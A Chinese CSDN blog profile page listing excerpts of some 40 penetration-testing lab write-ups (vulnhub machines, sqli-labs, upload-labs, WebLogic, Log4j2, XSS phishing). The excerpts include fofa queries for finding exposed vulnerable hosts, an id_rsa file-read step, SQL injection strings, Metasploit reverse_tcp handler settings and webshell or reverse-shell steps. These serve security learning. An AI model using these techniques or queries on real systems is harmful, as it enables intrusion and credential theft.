自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(40)
  • 收藏
  • 关注

原创 未授权rce漏洞

fofa语法:app="MajordomoSL"

2025-03-28 22:05:21 276

原创 任意文件读取漏洞

fofa语句:body="/@vite/client"

2025-03-28 21:56:42 260

原创 fall靶机攻略

file=/home/qiu/.ssh/id_rsa > id_rsa导出秘钥,再用cat查看:cat id_rsa。在历史记录文件发现这个用户输出了remarkablyawesomE并上传了,然后就执行了ifconfig,那可能这个就是密码,用户登上去之后就查看IP,我们尝试一下。扫到这么多,依次看一下响应码是200的目录,最终在robots.txt看到了。暂时还不知道这是什么信息,但是先有个印象,然后我在text.php看到了。说明这里是存在任意文件读取漏洞的,我们看一下里面的信息,发现了用户qiu。

2025-03-27 20:33:27 400

原创 Tomcat-Thales靶机攻略

(3)可能是把反弹shell的IP写成了靶场的IP,应该是kali的IP。上面扫出来的信息可以看到靶机开启了22和8080端口,那么我们去访问。用哥斯拉生成木马1.jsp,然后压缩成zip文件,修改文件名为war。我们上传的1.war现在是我们的目录,1.jsp在这个目录里。进入哥斯拉执行反弹shell命令,kali开启监听。那么我们在自己的主机上构造一个war包,上传进去。用VB打开镜像文件,并设置为桥接模式。(2)如果是桥接模式可能是IP变了。kali也设置为桥接模式。显而易见这种方式是不行的。

2025-03-25 19:49:14 524

原创 Nginx相关漏洞解析

原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞。

2025-03-25 11:04:41 532

原创 IIS漏洞再现

访问成功。

2025-03-24 23:36:23 704

原创 jangow-01-1.0.1靶机漏洞解析

因为这个靶机原本是在virtualBOX运行的,如果我们在VM运行的话可能会发送冲突,导致扫不到靶机IP,所以需要给靶机修改一下配置。既然可以传送1.txt,那我们去尝试传入一句话木马到1.php中。点到Buscar之后,在URL发现有传参的地方。在网页中输入一个123,输入到1.txt中。扫到IP为192.168.19.163。没报错,说明我们的php文件已经上传了。发现可以成功传入1.txt。成功反弹到shell。

2025-03-24 20:21:20 349

原创 Shiro漏洞再现

访问目录/login。

2025-03-24 19:04:11 116

原创 Spring漏洞再现

进入容器:docker exec -it 容器的id /bin/base。查看容器id:docker ps。输入命令ls /tmp。

2025-03-24 18:58:54 132

原创 Struts漏洞再现

发现可以显示246,那么我们可以进行利用。可以看到显示了root。

2025-03-24 18:38:38 285

原创 thinkphp漏洞再现

Thinkphp5x远程命令执行及getshell。

2025-03-24 18:32:55 274

原创 Apache漏洞再现

CVE-2021-41773路径穿越漏洞。

2025-03-24 00:05:43 157

原创 Jboss漏洞再现

出现了让下载的页面,说明有漏洞。

2025-03-23 23:25:04 473

原创 WebLogic漏洞再现

请求包中的150.158.199.164/1.txt代表着把我们网站的根目录下的1.txt上传到他的电脑上,并重命名为wjf.jsp。域结构——base-domain——高级——启动WEB服务测试页——保存。改为POST传参,修改文件类型为text/xml,添加请求包。改为POST传参,文件类型改为text/xml,添加请求包。f12,点左边的小箭头,再点上面的1,就可以显示出来id。环境就是上一个的环境不用变,访问目录即可。在我们的服务器新建一个xml文件。还是上一个的环境,需要访问目录。

2025-03-23 19:36:22 773

原创 Tomcat漏洞复现

开环境。

2025-03-23 14:00:56 207

原创 Web-Machine-N7靶机攻略

上传不成功,而且网址跳转到了本机地址,我们去抓包看下上传文件的包,但是我们点击提交查询并不会抓到包,那可能这个网站是在客户端设置为了我们提交数据的时候会跳转到本机地址,我们查看一下网页源代码。登录之后什么反应都没有,难到不是这样的么,又去查找了一下攻略,发现还有一个admin.php文件,我真是摇头苦笑了,去访问一下。随便点点什么反应都没有,现在有点走投无路了说是,突然想起刚刚扫描靶机的时候有一个目录是403,我们去看下会不会有什么发现。sqlmap -r "文件的绝对路径" --batch --dbs。

2025-03-20 23:35:37 272

原创 DeDeCMS靶场攻略

点击核心,文件式管理器,文件上传上传文件1.php,里面是一句话木马上传上传后去访问一下访问成功,测试连接。

2025-03-20 20:46:37 221

原创 wordpress靶场练习

进入靶场目录开启靶场docker-compose up -d。

2025-03-20 20:14:46 328

原创 matrix-breakout-2-morpheus靶场

发现这里有我们刚刚尝试输入的很多信息,说明我们上传的数值可以被传到file后的文件里,那么我们可以改包,新建一个php文件,把一句话木马写进去。包里看到了我们输入一个1,上传到了graffiti.txt文件,我们再去访问一下刚刚的txt文件。可以看到木马已经成功被我们上传到这个网站里,那接下来就可以反弹shell。1、安装靶机和kali,并设置为net模式,保证在同一网段下。在graffiti.txt里看到了一些可能有用的信息。访问了我们的木马文件,没有报错,那去蚁剑测试一下连接。2、kali扫描靶机。

2025-03-19 20:52:55 297

原创 joker靶机

第二个字典选择kali 里面/usr/share/wordlists/rockyou.txt 这是一个具有14万的字典。发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla。抓包,发现是base64加密,类似于tomcat的用户名和密码格式。点击TemplatePreview预览index.php。访问8080端口,需要用户名和密码来登录。放到intruder模块,爆破。Masscan快速扫描端口。进来找到index.php。爆破得到用户名和密码。

2025-03-19 00:19:37 215

原创 billu_b0x靶场

扫描靶机IP访问一下,先看看再说扫描目录看完这几条目录,找出来一些可能要用的上传图片的目录遍历的php文件admin登录页面。

2025-03-19 00:12:20 278

原创 log4j2漏洞模拟

log4j2是Apache的一个java日志框架,这个远程代码执行漏洞是由JNDI引起,JNDI其中有一个look up()方法,它可以远程加载对象,如果我们在我们的服务器上构造一个恶意对象让他来加载,它加载了恶意对象之后我们就可以控制它。

2025-03-17 17:36:20 397

原创 hackme靶机通关攻略

先让kali和靶机都是net模式方便我们去扫。

2025-03-13 23:51:02 274

原创 文件解析漏洞详解

在iis6.x中,.asp目录下的所有文件都会被当成asp文件执行,我们先搭一个Windows2003的IIS管理器,新建一个asp的文件夹在文件夹里新建一个1.txt,内容写上查出虚拟机的IP,在物理机访问一下这个文件发现这个txt文件可以被当做asp文件执行。

2025-03-13 21:13:47 814

原创 tomato靶机-通关攻略

注:/var/log/auth.log 记录了所有和用户认证相关的日志。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。查到源代码发现了include这个高危函数,这个函数存在的话就可能存在文件包含漏洞,我们去URL后面输入?访问到了日志文件,但是我们也看不懂,我们去尝试去蚁剑测试连接。首先看到了一个很显眼的文件就是info.php,进去看一下。这两个信息告诉我们可以远程读取文件,但是不允许包含文件。发现我们的尖括号和空格被编码了,我们给它改回去。

2025-03-12 22:00:48 125

原创 upload-labs-master 1-18关 通关攻略

我们从上往下看源码,第一个删的是末尾的点,第二个删的是空格,经过这两步我们就会发现我们的后缀名变成了:后缀名点,那么最后一个点是干嘛的相信大家心知肚明了,如果没有这个点,那我们的后缀就暴露出来了,会被拦截,如果有的话它就认不出来了,接下来我们就去操作了。二次渲染就是当我们的图片传到对面的服务器上时,它会把我们的图片里的某些东西打乱,但是不会影响我们图片的正常显示,所以我们需要在自己原有图片的基础上插入一些东西,把这样的图片放进去就可以了,我这里有现成的我就不放了。可以看到我们的路径多了一个111.php。

2025-03-11 21:54:27 733

原创 XXE靶机 通关攻略

刚刚告诉我们flag在这里,但是进来之后却给我们报404错误,那肯定是在这里的,只要我们细心观察就可以看到一个新的文件,我们去查看一下。解出来的东西我们不认识,但是我们知道他是php代码,所以我们自己新建一个php文件,把代码写进去,然后访问自己的php文件看一下。抓到了登录页面的包,简单分析一下这个包的格式,我们可以清楚的看到下面的格式是xml漏洞格式,所以我们将在这里进行漏洞利用。其次,构造xml,刚刚我们有个admin.php文件没访问到东西,现在我们指定admin目录去看一下,应该可以发现什么。

2025-03-10 19:55:07 474

原创 xxe-lab-master:php_xxe通关攻略

我们的目的是利用靶场,读取到文件。

2025-03-10 18:17:57 117

原创 ctfhub-web-ssrf通关攻略

题目提示我们访问本机的flag.php,那我们便去访问一下OK,出来结果。

2025-03-09 16:55:49 933

原创 csrf漏洞,靶场是metinfo

我们既然想要修改他的数据,那我们得先知道他修改数据的包是什么,在复现这里因为我们可以用BP直接抓包,实战中就需要自己去找了。

2025-03-06 19:14:21 144

原创 xss-flash攻击钓鱼

set payload windows/x64/meterpreter/reverse_tcp //使用Windows64的监听。当管理员下载这个文件后我们就可以控制它的电脑了,但是现在这个文件里还没有病毒,所以我们要制作病毒。然后再输入病毒命令就可以了,这样我们可以看到在root里生成了一个shell.exe文件。use exploit/multi/handler //使用监听模块。set lhost kali的ip //监听的地址。set lport 4444 //监听的端口。

2025-03-05 20:01:12 391

原创 利用xss获取管理员用户名密码

打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去。7、回到我们的xss平台,刷新,查看,就可以得到刚刚我们模拟管理员的用户名和密码了。3、点击立即提交后在我们的项目模块里找到自己的项目,点击右上角的查看配置代码,1、在网站https://xssaq.com注册账号,并登录。2、在项目操作模块点击创建项目,并输入项目名称。5、模拟管理员,登录后台地址。复制script这⼀条代码。6、输入用户名和密码。

2025-03-05 13:39:35 157

原创 ctf4靶场,获取数据库权限

接下来就是去查看各个库的各个表,最终我们可以在ehks库的user表里查到我们想要的数据,用户名和密码。找到了这个目录,后面写着id=2,我们尝试输入一个单引号看看能否报错。报错了,说明在这里可以进行sql注入,那么我们就随便输入个数值,抓包。查到了六个数据库,我们接下来一个一个的去查,看看哪个可以查到表。2、去物理机访问ip,随便点点,看能否发现又sql注入的地方。在calendar数据库里没查到我们想要的表,所以查下一个。在ehks里查到了user表,我们再看看其他的数据库。在后面加上--dbs。

2025-03-05 00:17:50 159

原创 sqli-labs通关攻略(16-19关)

我们在上一篇文章里已经讲过布尔盲注了,所以这里简单的说一说就好了。

2025-03-04 21:38:26 431

原创 AI-web1.0 通关攻略

第一个选4第二个选2。

2025-03-04 13:24:04 377

原创 sqli-labs通关攻略(13-15关)

1') #

2025-03-03 21:54:36 372

原创 sqli-labs通关攻略(9-12关)

时间盲注的原理是利用sleep()函数,根据页面的响应时间来判断我们所输入的代码是否正确。

2025-03-03 01:18:08 1049

原创 sqli-labs通关攻略(5-8关)

第5-8关包含了报错注入和布尔盲注。

2025-02-27 19:55:14 861

原创 sqli-labs通关攻略(1-4关)

id=-1' union select 1,2,3 --+ #可以看到输出显示的字段为2和3。id=1 and 1=2 #正常 说明一定不是数字型注入,考虑其他注入方式。id=1'--+ #正常 输入注释符号--+闭合成功,是字符型注入。id=1' order by 4 --+ #报错,说明字段数量不是4。id=1' order by 3 --+ #不报错,说明字段数量是3。id=1 and 2=2 #正常。可以看到数据库的名字为security。

2025-02-26 19:07:24 293

原创 ctfhub-web信息泄露 通关攻略(部分)

https://github.com/kost/dvcs-ripper地址,下载压缩包,并拖到虚拟机kali里,用管理员权限打开文件,并打开终端(下载流程在上一道题里,这里就不过多赘述了)4、以此类推,每进入一个目录里都用ls -a查看一下所有文件,有目录的话就进目录里找文件,没目录就直接查看文件,挨个查看,就能找到flag(查看文件的命令是cat 文件名)(1)在导航栏中,把下面和上面一个一个拼起来,比如:/web.tar /web.tar.gz /back.zip等等。

2025-02-25 21:49:28 383

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除
手机看
程序员都在用的中文IT技术交流社区

程序员都在用的中文IT技术交流社区

专业的中文 IT 技术社区,与千万技术人共成长

专业的中文 IT 技术社区,与千万技术人共成长

关注【CSDN】视频号,行业资讯、技术分享精彩不断,直播好礼送不停!

关注【CSDN】视频号,行业资讯、技术分享精彩不断,直播好礼送不停!

客服 返回
顶部